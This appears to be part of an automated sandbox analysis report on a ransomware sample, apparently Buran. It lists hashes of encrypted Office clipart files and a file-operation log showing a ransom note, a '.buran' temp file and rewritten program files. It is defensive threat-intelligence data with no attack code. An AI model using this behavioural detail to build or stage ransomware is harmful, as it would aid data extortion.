SHA1: 6b39868cd021bf6ed98dbefe5430633b482c8f8c SHA256: 368eeeb7088e8d0f1cacde574fa57342fe83dcf631b1e2844a81ff0fd4f569ca SSDeep: 48:1/CB4gYTvi4P/17q3ljlWpbKbVd53lQ/ch91QqjD+UjwlB+oDWaZW:yai4FYkluVdxlQ/X+CUjwVfY |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 3.89 KB |
MD5:
c5a094a7f2ce50b386970c4d7f1d974b
SHA1: 147d4fa9db26f137f7d4ecabf2949b1248e0f226 SHA256: 94b0e530fed112c246524498a73b656b151e5152c581f43f399fd32a47ce0713 SSDeep: 96:/rRKfigpU1C4RIReOB1oJLG4ZqIS56ZbVVCLzslo:kffpU1pRPOfSC4ZqI2MrCfse |
|
|
| c:\users\5p5nrgjn0js halpmcxz\appdata\local\virtualstore\program files\microsoft office\clipart\pub60cor\an04326_.wmf | 3.27 KB |
MD5:
315ff0927abe1a9230efc6c0065dcfe5
SHA1: d9ed2c558bb26926b8ee00ee6e01d0d4c8a988f3 SHA256: 4accfd7672933767f868128eb0cad3b0c8ccbf1e04ebe0996ab4e29a69dfc0e8 SSDeep: 96:RJY/npm7dNyrZKq7KFXvObgheMQHeCH41xrTY:7qpmpNy0q7avCgheMQHeCH41tTY |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04326_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 4.74 KB |
MD5:
fb8e1286fce6281fca80eecfa4d50ead
SHA1: c8fd4d71b11c8c1ff93ecd8a72de5727f26a4a59 SHA256: d9824af3f4d4d6a60068ddbafa00dee3c5de62045818aad571182a0d5648b814 SSDeep: 96:VPkqVfpaVMnqTvLvXkUBiIz0jR7o0mOxUAX456ZbVVCLzslo:J3VLUBiU0t7ksUMrCfse |
|
|
| c:\users\5p5nrgjn0js halpmcxz\appdata\local\virtualstore\program files\microsoft office\clipart\pub60cor\an04332_.wmf | 4.20 KB |
MD5:
1f24029d8daff1819a99c36c01edbedc
SHA1: 2d99c44d76f320b5aa32af2fa061afd72f37c338 SHA256: 5ab2fe1a1d27e75852737af33d073ef57411d84fd9f340cfd655953ad8ffb58f SSDeep: 96:vJGRqy/SRERWnmFwIBHuO+q6bxn0OY278dB/YXmCYeQYshWfLlTJ0gTQ14Tk:hFytRWmHHuO+qQl0OT7OlCmCVQtOLlTi |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 4.61 KB |
MD5:
1cd1794a19311a3d052fc34df4097961
SHA1: f49b169e7066456a9085861101d392b073c148bd SHA256: 09c09787a300bca1c4901568b606143f5ef59a73ccd67d7ae943d1c46690e9bb SSDeep: 96:s98Pexgt9KjpdOBLfeO1yjn02f85IlAZCC256ZbVVCLzslo:s9MeoojpdOBLfe0yjn0vIl8CtMrCfse |
|
|
| c:\users\5p5nrgjn0js halpmcxz\appdata\local\virtualstore\program files\microsoft office\clipart\pub60cor\an04369_.wmf | 4.70 KB |
MD5:
00a08a02bf393db5ea393ed98a724b94
SHA1: 4429c13c3b9166c66195f10fb06d52c11effe574 SHA256: b04bf2ac764992c1c02f672c32a214f3faed2bb5e3b679027c7722180a1b5818 SSDeep: 96:AJVLoxQRq3WDtrqsWB4MKAbd2gULwgI8PZmDn:WZoeRTtrKiAxULwH8PZ0n |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BABY_01.MID.-20D3E156-A287-60BB-BBEE-4579C665442A | 7.21 KB |
MD5:
800cafc58c686ea77cc690f694d1077f
SHA1: 8c282e0203907f20e2382fe1f8d450e610d06438 SHA256: 80c4faf77b998423fec4f3e8c6dd7a06f7c2af52464cfc25a323b876ab74bb34 SSDeep: 192:RprCIC+CUC+CUC+C8kYJQQQQQex6KLRvs3DMA9WCuWCp:RpOIgUgUg8kYJQQQQQex1R5A9gp |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00116_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 4.76 KB |
MD5:
0d1dcdf9ed0a94e7148e445df2bc4de6
SHA1: c27a841ac5658568d003c7e5ca260456bff68bd1 SHA256: 3f7b2f380055056aef9617a6b80646ae79e2e07f7db2bf2bc43d6e5d261f385c SSDeep: 96:z/JM0o/ci3Nwx4VJd0KjDediZmtyRVxpST4FQRd3L4FQRd3EVwFl02UqEYvTBR39:lMVyx4VJdfjDediZmt2xpG44b44UVKlx |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00146_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 28.27 KB |
MD5:
64f243084cb9d15d295efca4064f82dd
SHA1: 69ad5db70247bc8cfe069515473bd74e9f4f41f6 SHA256: 14edca0786bf28a31127b8c40255d2adc0f50c0f0ea38479987e7d5389e1248a SSDeep: 768:AnC2KLqmi5AfdzGi3bHCQc9yM2XvlomvoK+hlJZFAf5iUnZlh+LiakoAstICYF7T:1dNBQ0mhyXCKG62wNL/5 |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 11.36 KB |
MD5:
cd42411c780fbee9a182da468cacfd7d
SHA1: ec10c6ee28bf6ac9118dada9b988c325b938580a SHA256: d93fcfb3ff53bffdcc22351fad95d4d9e7b11074ed1f8d79b83cc74842fb9fd9 SSDeep: 192:2xtAOP927mZ8OuHNRDgXjXIGInt6RVIMVM4tu6kYoF7DUuFN58G4xcnScxPsfDlf:2xtDM7mZ8BmrIGE6RVIMVM4tu6kYoF7s |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00160_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 21.99 KB |
MD5:
d73e5293af5cdc261f1ed60a0bbdbc7d
SHA1: d4430fdb810a917dc5e59a00274bf766b80e0be3 SHA256: 9aa10a7767b264ae1e9243db8130e018bdae1d919096cbe22d430c6ca9bfc189 SSDeep: 384:Is6r8M1mJk/dluq9s76GmW8BxdvzeDVoa5myWKYba38exzRui7c6JCuRKeSCz8Pu:I7r81Jk/2q9s9mW8Bxdvze5oaYyWKYbE |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00173_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 15.80 KB |
MD5:
72f40f0f42540debb1cf088e9dedd3c8
SHA1: 711dd5ff2a063a94e7222559f1cdf0556cfaf640 SHA256: c3133ad7fe3dac30578040210e9943c4d2d5c18864f44fdbe02488c13558cee1 SSDeep: 384:3oVk2+VIKj58FUO8u67wmmHqNc5XTfe8eLZAzy/X7RV4V+RX/Ldh0llj1/9/EY7S:3Uk2+Vt58+O8u67wmwqNc5XTfehLZAWD |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD05119_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 16.83 KB |
MD5:
361ec42b304d42bb30c82157fc4876ac
SHA1: 07b49dc5ac0b6b477a54b48b866a0cf53c791fb7 SHA256: 26b57cee23b72c0223a47228382c2e5ab549c144240acd64998a61b9f18cd491 SSDeep: 384:xL55ROgj/lrYyB8AqyFlxjM4bOzAAI9fTguitwCX7L:xpLZrHuAqGxHOzPjtwCX7L |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06200_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 16.29 KB |
MD5:
fc8f4c8dea257aba885ecfdd76e7253e
SHA1: a63f3c37c2c3667431c87593bdd6fa27b5022bf3 SHA256: 9c8693aa92c5470d95bf5114d4740c9898b1d261c92809872b922e6c6ca02bda SSDeep: 384:81vmFtzk0THj4Y3lC5GZ20wLi14cVVeixCUS0oWMD7oKSXWqOWMHgJBoq1Baqifp:8pm3Q0ff1C5GZ20wLi1HVVeixlS0oWML |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07804_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 4.81 KB |
MD5:
714977129caed5cfd38159c16830a7ea
SHA1: a2108a5236929c8809c8a8767fe1bdbd2d2bb17f SHA256: 761fc87339ee96737c22125a75a2c0f76a0e4d0580b41a993ff720235d1b7afb SSDeep: 96:0JQiGD3QayRZmJUdsYUHnIsSmLw0BhQLHC2ysjTYdlmQD/qorR3jT7d:6QiGsayRZGUdsYUHIsSms0BhQLHCtsT2 |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 3.97 KB |
MD5:
85c3cf87edc67a9ebbcddd17a3ded333
SHA1: cfe2bb790e47e20dc2aca9b2bf2b562c68640e0f SHA256: a90d54883ae20ed153b315da22f924b3bec56705e6c63454e86bc8c9a3aaf6eb SSDeep: 96:wJ1V0urvwKkSiZ18kjV9YtmBy+s5tINZCZjYPP4Zb6tmzcr3m6:G304YnSiv8SXYtmsXtgZCZjqPA6tmzcp |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08773_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 24.20 KB |
MD5:
f38cb32b56d41a35535c120e46e81f19
SHA1: ee8ffedf44349856bce3d760f1294ae83bd12ea8 SHA256: 960cc07f35ab745818a404f13191389a3f43a210f7adfb117ac256692d723172 SSDeep: 384:yyf+LkSDlfTCbv7A8varAuKXNfVcIzF8M2iBJ3UBx359EgBSBUmEnAw07SSs8m:yc+HpqE8veAuStzaMvJEBxp9RSB2n46 |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08868_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 39.26 KB |
MD5:
a33c32182ab424a0958ae1bc6df3738f
SHA1: ef6c144549ef6d53260d3ed08d75540310568a25 SHA256: b00519c20905ec40e2e0ffe7f9368095d9adfd233bc0a16d620033c0a0d5ff4f SSDeep: 768:PzD607BWZBPz43+ZS21BYTpvAPCP0zwITG/wBWOKEe3Jqhc:P607YPNql4KP0z9S/i7QJf |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09031_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 46.67 KB |
MD5:
16514f3fedac5822de85f4e735f509ff
SHA1: 1a270ff242ab2f16a5697a19352c24b2a5f78b17 SHA256: 428a4838e436533b62ff7901f36f880f0ecc9f9690909c2184d40f14a34d89b0 SSDeep: 768:GNf5Co/PqvU+Dqf/f+BQ7kCHEC+r7lHuAA08lMHojdJhm6RqweaB59h0Vj+UGbQf:uf5C8PqszP+5lrhHumHcdCKqwwPGbQf |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 14.20 KB |
MD5:
0538d56c7bf155c0c65174c61c7618ff
SHA1: 716a79bbd28cc58193e760423c4ac53f0de84ca3 SHA256: 1e1a5e151c478d5aedb5f7a4632559372f120c5fde73ff6ee19867791dafdac2 SSDeep: 384:x6fzQrQR2eIr0tYyM0znUO2UaPOUZGufMSDBDyKAA:x67QrQR2eIr0ylYnc5fxDFyw |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09662_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 20.07 KB |
MD5:
23531b1a2b7b409fae00423b602c235e
SHA1: 3080909c100de9840e06283769aecfa0dd486709 SHA256: 3e65f98fd96adfed1e0211fd914276815c346f57ba4b40c693c1743d08cf3cb2 SSDeep: 384:BtX9FpZF++LJhfUsdwwfYOiof8plbxXJl8M74KpXzlmWJH9RyYwzzmOI+RNdkhlT:7X9Fpb38+aOLf8VXJl8M0KpXzlmWJd4s |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 7.78 KB |
MD5:
085e9a0d621b2a9114e11ca7f7ba7d46
SHA1: 95c088ab0759414a50b9d805055b13f37d9ff88e SHA256: f1ba747428d5aa69e54b75b9985db636e440efd1733e8aa16526f1f37f2fb587 SSDeep: 192:iiph805wfAH4nf3CJlT4WHr3BSFOEzWvkpOkJWHfSNx31GzEJ6YUoy1kTQirr6iJ:i08Rg4nKAWH1oykpOk3x31Go4YZy1kMW |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10890_.GIF.-20D3E156-A287-60BB-BBEE-4579C665442A | 13.20 KB |
MD5:
a774d8a65fadfbc0b683002b0c13b6cd
SHA1: 5577eb6498c49e82329efbd8b5e235c6c09a8bfa SHA256: 0ab9172ce5baa34b07a2f8fe18af4b56f12df5e5f702da8d7ee166bd1e66116d SSDeep: 384:LSZCWR+JO6ePsWR/8JBBpxtaMwisArcgw:Lgv36ePsWRkdpxta5isccv |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10972_.GIF.-20D3E156-A287-60BB-BBEE-4579C665442A | 19.72 KB |
MD5:
df6b2f1be0e9dd21ff7cb42f2639971d
SHA1: 9e00b4a5c6ae90844e9228e84fe8c032ddfd674a SHA256: dede6b3a4dca308660798cdf5f17f3d0db8fb9a555a7541b6195893f40e9aff8 SSDeep: 384:lSIX013bX99oje/jtXiM7t3acqk3tTHB2uuj9yhyqCVtK:ltXYgQtXiMB3xqkdTH29KGvK |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19827_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 9.48 KB |
MD5:
2b47156c17773cc132d9b3bbbce0c4e1
SHA1: 079fa051d90d53930fb3c7386b1f7b15774dcd4b SHA256: f8efdd42666356deaab8d00d7fcf57b01a5efe1ee028f13f01cefec9b6204b2a SSDeep: 192:HOquE9PxA/YD43GYCoSTmBgSyapCY1l5kYzoCQ1JMhkptm56g/:HtnPxNzoSPVMCYRnzQPMuG56g/ |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19828_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 8.57 KB |
MD5:
c00d7aeef3cbbebee5fc330ec4b02e0f
SHA1: cb695d312f0173123b439c65a83b8773f30b6915 SHA256: d7c715de84b4baab39d08787d292ea42dc625954a11d52c7259bf89d9c135823 SSDeep: 192:mHB57C6c9OC1oVtPsjC+ps/wDRCkqjaG4hAkhzJ7W9FRj:mHXCRyDcHs/GR2xA7hsFRj |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19986_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 14.15 KB |
MD5:
f47beb5612aa13fd016912500151bc5c
SHA1: ed0ff09cac0d747c5a088bf866e019772ce68113 SHA256: 60d42ee9427756f2a04e224f9d64e98f68ea3e09f079a0344350df67bd9325bd SSDeep: 384:Jfudn5zFOLwfy6QTW3/ZGLyKNngxLynkc:JCVFOLwq83AbJkc |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 10.80 KB |
MD5:
0f72d5bfa65af6a93147ca8b9907f3c0
SHA1: ddab3d5edd0267c1691994b5c09c8fe52dcb5991 SHA256: 49030d0018254293bac703c01ae2a67500b32aff521d9665e7545629f4264127 SSDeep: 192:JeXwBfsnL4eKmltkinujbS0oQ33Oe/k5uWRB6GLpwA3uLsnMeHLDiZuRAFGBg:JIwKnL4evtuXOes8S4qUfUviURAFGe |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00012_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 9.59 KB |
MD5:
aeb0b32638239613dd1347d6bc9cf6a3
SHA1: 1bb0773274a4ecfabcea1d164256ccb6c262b67f SHA256: 7f8144784b4466723357dfd7295acc5f27d1df59683939f04606d62467d95e38 SSDeep: 192:/Q7fS2NZqFDqsV1gFkoa8miLtheZTJ9G15PP2AG5f:orSs+DXqmotwZTJK52xf |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00130_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 1.43 KB |
MD5:
83f03388a1d3efe70d5b166fe6c2a2a7
SHA1: 0eef8c9a26fd16d44f15746956d381104d57298c SHA256: 48ae7a8fbb74a0a1eac4491a347faeb4863c0a5ed4da1cf2a2a3dcbab7fb7ac4 SSDeep: 24:t/nA3Hi8KeohCF3sFnRhCty/luqV2eRhClYM9Klr+NhCGQWoq6ukveL6ntdWtcbc:901VoE36ec2urUB+VveLKQtcIUG27eyw |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00148_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 1.66 KB |
MD5:
4ce0827a7f45a45c08b2a0fd60b25647
SHA1: db7df5cde4330ff6dc95e9cad33f5f05b6e69f18 SHA256: f12de134086e807930175a19566680778928208f779d7907d3c208ad40577e0d SSDeep: 24:t/0fbE9A3Hih+KhZmhC8U/NdhCNN1w27+9hCTUhCvbjSxGIoK7Qh5YLx4VQuHlsx:1020lJSd2190NmbjSxGucvBQuSrio |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00152_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 1.48 KB |
MD5:
c27fa18b7f7bc45a0790a7352a579d7a
SHA1: 9b5c3f5645ca1f67597818d01d34c2900ec3bb28 SHA256: 5c6c9aa794d7ad032fa81d0422654d9bacfd6b53dedb4ccdba095e6493b55ba0 SSDeep: 24:t/BeTxVA3Hibjh/WPuTh/NY2OerMkxCslGlpXeLzGfViRBPfsmtYIhY55QCCMjQy:1BeTn0uJWPwJOq4kEslGCn88ndtYPICd |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00242_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 3.93 KB |
MD5:
d1aba12c9f5c22950ec568876d37e76f
SHA1: 4a82e4a634bfef8c8e45e35fd6cca6ae13ffe5ba SHA256: 66b79ebf08f37ba0be9c9eaa138159b4fd7c577bf2b937c4be655cb699308284 SSDeep: 96:Femu1JUOBTYS0Ln8ax67h70pC+dtlHxS+IjwEQKEsdhSu:M7/BXUdwh70pC+zlHxS+Ijw1ASu |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00247_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 14.11 KB |
MD5:
73cf1e415913541ea1484f619d21f90e
SHA1: 024a9de6cab55f3e72d7e01a15439df83013af72 SHA256: 27a82c228abd25a4a23b29541dd654762c3a730e9052e0802a24f1699e187a0c SSDeep: 384:mhCTyCuuRMm9dLQBpK/XmjB39FqMV3qEb3R9WJfrox582uKm42S+ab12eCgUjYu1:mhCTyCuuRMm9dLQBpK/X4B39FqMV3qE8 |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00248_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 1.50 KB |
MD5:
3f84f8c84daa58c5fd714487c9682446
SHA1: fec395f951eaf33b1b39026bfc768ba6ee264edb SHA256: 4ad09a4bedb8c637289bbd0778801a6c28a19f30b0b21eaf4315deb03c3bd1a7 SSDeep: 48:5i/K4/otLpNODHXqLpSGRZyOELk0sLkiLkVcYJLkG19Lki7K7c:5Q1orNI3iSE0Rzit6 |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00252_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 4.60 KB |
MD5:
d532df7640dd7181640215eba285627c
SHA1: fa36d3604e8a1d9278be52f9b0368c0d62976ecc SHA256: 83b1578c11a75a713b90b174d2fffe73ec418758ecfa4158a3e76968880ba7ed SSDeep: 96:cezmWx9OOhxF6gIngLo/vdMC3fxBtqzQuKyV2DW4MqRLJKLM9YdbMloL3m2sggfh:xyWx9OOu9ngLo/vdJ3fNqNK+WbMq5JKc |
|
|
Host Behavior
File (6772)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\5B51C018.buran | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\-0WGp.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\bootmgr | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\1rk85P.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\andersonassociate.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\audiodepthconverter.ax | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\bod_r.TTF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\directshowtap.ax | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\DVDMaker.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Eurosti.TTF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\fieldswitch.ax | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\offset.ax | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\rtstreamsink.ax | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\rtstreamsource.ax | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\SecretST.TTF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\soniccolorconverter.ax | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\sonicsptransform.ax | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\7ipS.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\Common.fxh | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DissolveAnother.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DissolveNoise.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\Filters.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\Parity.fx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BlackRectangle.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_glass.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_selectionsubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\9ElWv1el4-AEdsTzk.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\circle_glass_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureA.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureB.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_VideoInset.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\DvdTransform.fx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\heart_glass_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_VideoInset.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
